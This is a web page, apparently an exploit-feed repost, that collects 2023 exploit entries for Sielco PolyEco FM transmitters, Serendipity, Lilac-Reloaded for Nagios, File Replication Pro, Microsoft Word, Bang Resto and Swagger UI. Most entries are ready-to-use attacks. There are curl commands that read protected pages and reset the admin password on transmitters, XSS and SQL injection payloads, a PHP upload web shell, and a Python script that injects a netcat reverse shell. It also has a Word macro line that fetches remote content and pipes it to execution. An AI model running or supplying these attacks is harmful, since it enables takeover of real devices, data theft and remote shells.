All posts published by ISHACK AI BOT
-
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5768
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php

26.01.2023

--

index.htm (lines 54-74):

```javascript
function dologin() {
    var hash = hex_md5($('#password').val() + id);
    $.get('/login.cgi', {
        user: $('#user').val(),
        password: hash,
        id: id
    }).done(function (data) {
        var dati = $.parseXML(data);
        id = $(dati).find('id').text();
        user = $(dati).find('u').text();
        if (id == 0)
            window.location.href = '/index.htm';
        else {
            scriviCookie('polyeco', id, 180);
            if (user >= 3)
                window.location.href = '/protect/factory.htm';
            else
                window.location.href = '/protect/index.htm';
        }
    });
}
```

The function 'dologin()' in index.htm is called when a user submits the login form. It starts by computing an MD5 hash (hex_md5) of the user-entered password concatenated with the variable 'id'. It then makes an HTTP GET request to the 'login.cgi' endpoint with the entered username, the computed password hash and the 'id' variable as parameters. If the request succeeds, the function parses the XML returned by the server and extracts the values of the 'id' and 'u' elements. If 'id' equals 0 the user is redirected to '/index.htm'; otherwise a cookie named 'polyeco' is written with the value of 'id', expiring after 180 days. Finally, if the 'user' value is greater than or equal to 3 the user is redirected to '/protect/factory.htm', otherwise to '/protect/index.htm'.
An attacker can exploit this by modifying the client-side JavaScript to always set the 'user' variable to a high value (4), or by tampering with the data sent to the server during the login process to change the value of the 'user' variable. It also works if the server's response variable 'user' is modified.
-
Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5767
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php

26.01.2023

--

```http
POST /protect/rds.htm HTTP/1.1
Host: RADIOFM

rds_inta=1
rds_intb=0
rds_pi=381
rds_ps=ZSL
rds_rta=www.zeroscience.mk
rds_rtb
rds_rtt=0
rds_tp=0
rds_tp=1
rds_ta=0
rds_ms=0
rds_pty=4
rds_ptyn=
rds_ecc=00
rds_ct=0
rds_level=90
rds_psd=0
rds_psd1
rds_pst1=0
rds_psd5
rds_pst5=0
rds_psd2
rds_pst2=0
rds_psd6
rds_pst6=0
rds_psd3
rds_pst3=0
rds_psd7
rds_pst7=0
rds_psd4
rds_pst4=0
rds_psd8
rds_pst8=0
rds_di_pty=0
rds_di_cmp=0
rds_di_cmp=1
rds_di_st=0
rds_di_art=0
rds_di_art=1
a0=90
a1=9
a2=26
a3=115
a4=0
a5=0
a6=0
a7=0
a8=0
a9=0
a10=0
a11=0
a12=0
a13=0
a14=0
a15=0
a16=0
a17=0
a18=0
a19=0
a20=0
a21=0
a22=0
a23=0
a24=0
```
-
Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

Desc: Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request, to gain access to sensitive information.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php

26.01.2023

--

```shell
$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi
```
-
Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

Desc: The application suffers from an authentication bypass, account takeover/lockout and elevation of privileges vulnerability that can be triggered by directly calling the users object and effectively modifying the password of the two constant user/role pairs (user/admin). This can be exploited by an unauthenticated adversary by issuing a single POST request to the vulnerable endpoint to gain unauthorized access to the affected device with administrative privileges.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5765
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php

26.01.2023

--

```shell
# Change admin pwd
$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
```
-
Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Ağalarov
Application: Serendipity
Version: 2.4.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux

2. Technical Details & POC
========================================

Steps:

1. Anyone who has the authority to create a new entry can submit this payload in the entry body:

hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E

```http
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
```

2. Visit the entry you created; the payload executes in the viewer's browser.
-
Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
```python
#!/usr/bin/env python
"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A

The autodiscovery feature lacks any kind of input filtering, so we can add
our own commands there terminated with a ;

Use at your own risk!

RCA - wild exec is ongoing without any filtering in library/Net/Traceroute.php
(lines 181-190 and 257-262):

function _setTraceroutePath($sysname)
{
    $status = '';
    $output = array();
    $traceroute_path = '';

    if ("windows" == $sysname) {
        return "tracert";
    } else {
        $traceroute_path = exec("which traceroute", $output, $status);
[...]
function traceroute($host)
{

    $argList = $this->_createArgList();
    $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
    exec($cmd, $this->_result);
"""
import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
                    help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php)",
                    required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()

# Command injected through the unfiltered nmap_binary field, terminated with ;
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"

body = {
    "request": "autodiscover",
    "job_name": "HackThePlanet",
    "job_description": "HackThePlanet",
    "nmap_binary": rev_shell,
    "default_template": "",
    "target[2]": "1.1.1.1",
}

try:
    r = requests.get(args.url)
    if r.ok:
        print("[+] URL looks good...moving forward...")
        print("[+] Sending exploit in...")
        r = requests.post(args.url, data=body)
        if r.ok:
            print("[+] Got HTTP 200, check your listener!")
        else:
            print("[-] Some kind of error happened, check the http response below!")
            print(r.text)
except Exception as e:
    print("General exception: " + str(e))
```
-
Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Application: Serendipity
Version: 2.4.0
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

If we upload the poc.phar file in the image field while creating a category, we can run commands on the system.

```php
<?php echo system("cat /etc/passwd"); ?>
```

I wrote a file with the above payload, gave it a poc.phar extension, and uploaded it. Then visit http://localhost/serendipity/uploads/poc.phar

PoC request:

```http
POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
Host: localhost
Content-Length: 1561
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close

------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[token]"

ae9b8ae35a756c24f9552a021ee81d56
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[action]"

admin
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminModule]"

media
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminAction]"

add
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd");?>
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][1]"

poc.phar
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][1]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[column_count][1]"

true
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageurl]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageimporttype]"

image
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][]"


------WebKitFormBoundaryZWKPiba66PSVGQzc--
```

PoC video: https://youtu.be/_VrrKOTywgo
-
File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
# Date: 2023-04-13
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com
# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe
# Version: 7.5.0
# Tested on: Windows 10 Pro 22H2 x64
# CVE: CVE-2023-26918

Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation: a file in the installation directory can be replaced with another one that is then executed with "LocalSystem" rights by the Windows Services application.

```
C:\Program Files>icacls "c:\Program Files\FileReplicationPro"
c:\Program Files\FileReplicationPro Everyone:(F)
                                    Everyone:(OI)(CI)(IO)(F)

C:\Users\Administrator>sc qc frp
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: frp
        TIPO                       : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                 : 2   AUTO_START
        CONTROLLO_ERRORE           : 1   NORMAL
        NOME_PERCORSO_BINARIO      : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp
        GRUPPO_ORDINE_CARICAMENTO  :
        TAG                        : 0
        NOME_VISUALIZZATO          : FRPReplicationServer
        DIPENDENZE                 : Tcpip
                                   : Afd
        SERVICE_START_NAME         : LocalSystem
```

To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs with LocalSystem privileges as the "frp" (FRPReplicationServer) service, since the application's path grants "Everyone" full access permissions.

Moreover, the "properties.xml" file in the "etc" folder inside the program's path contains the hashed password for remote access, stored as a base64-encoded SHA-1 digest, and it can be modified. Replacing it with a new hash, generated by hashing a string with SHA-1 and base64-encoding the digest, grants login access to the application's web interface.
-
Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311

## Description:
The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website, which could lead to a local attack on the victim's computer. The attacker can trick the victim into opening a malicious web page by means of a malicious `Word` file, and can then steal credentials and bank account information, or sniff and track all of the victim's traffic continuously, depending on the scenario.

STATUS: HIGH Vulnerability

[+] Exploit:
The exploit server must be BROADCASTING at the moment the victim clicks the button of the exploit!

```vbs
Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)

## Proof and Exploit
[href](https://streamable.com/s60x3k)

## Time spend:
01:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
-
Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848

*Steps to Reproduce:*

1. First log in to your admin panel.
2. Then go to the Menu section and click "add new menu" from the group. Your request data will be:

```http
POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close

itemName=test&itemPrice=1&menuID=1&addItem=
```

3. Then put any XSS payload in the "itemName" parameter and click add.
4. You will see the XSS pop up.
-
Bang Resto v1.0 - 'Multiple' SQL Injection
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849

*Affected Parameters:* btnMenuItemID, itemID, itemPrice, menuID, staffID, itemID[], itemqty[]

*Steps to Reproduce:*

1. First log in to your staff panel.
2. Then go to the "order" menu, select a menu item, create an order and intercept the request with Burp Suite. Your request data will be:

```http
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close

btnMenuItemID=1&qty=1
```

3. The "btnMenuItemID" parameter is vulnerable. To confirm with a union-based injection, place this value in the "btnMenuItemID" parameter:

```sql
.1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- -
```

4. Check the browser: you will see the database user, database name and version.
5. You could also use sqlmap to dump the whole database by saving the web request from Burp Suite.
-
Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
```python
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com

from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":
    target = sys.argv[1]

    # Enable Chrome DevTools performance logging so network events are recorded
    desired_capabilities = DesiredCapabilities.CHROME
    desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

    options = webdriver.ChromeOptions()
    options.add_argument("--headless")
    options.add_argument("--ignore-certificate-errors")
    options.add_argument("--log-level=3")
    options.add_experimental_option("excludeSwitches", ["enable-logging"])

    # Browser webdriver path
    drive_service = Service("C:/chromedriver.exe")
    driver = webdriver.Chrome(service=drive_service, options=options,
                              desired_capabilities=desired_capabilities)

    # Load the target twice, once with each parameter that can point Swagger UI
    # at an external definition, and let the page fetch it
    driver.get(target + "?configUrl=https://petstore.swagger.io/v2/hacked1.json")
    time.sleep(10)
    driver.get(target + "?url=https://petstore.swagger.io/v2/hacked2.json")
    time.sleep(10)

    logs = driver.get_log("performance")

    # Keep only the network events from the performance log
    with open("log_file.json", "w", encoding="utf-8") as f:
        f.write("[")
        for log in logs:
            log_file = json.loads(log["message"])["message"]
            if ("Network.response" in log_file["method"]
                    or "Network.request" in log_file["method"]
                    or "Network.webSocket" in log_file["method"]):
                f.write(json.dumps(log_file) + ",")
        f.write("{}]")

    driver.quit()

    # A request to either marker URL means the page fetched the attacker-chosen definition
    json_file_path = "log_file.json"
    with open(json_file_path, "r", encoding="utf-8") as f:
        logs = json.loads(f.read())

    for log in logs:
        try:
            url = log["params"]["request"]["url"]
            if url == "https://petstore.swagger.io/v2/hacked1.json":
                print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
            if url == "https://petstore.swagger.io/v2/hacked2.json":
                print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
        except Exception:
            pass
```
-
AspEmail v5.6.0.2 - Local Privilege Escalation
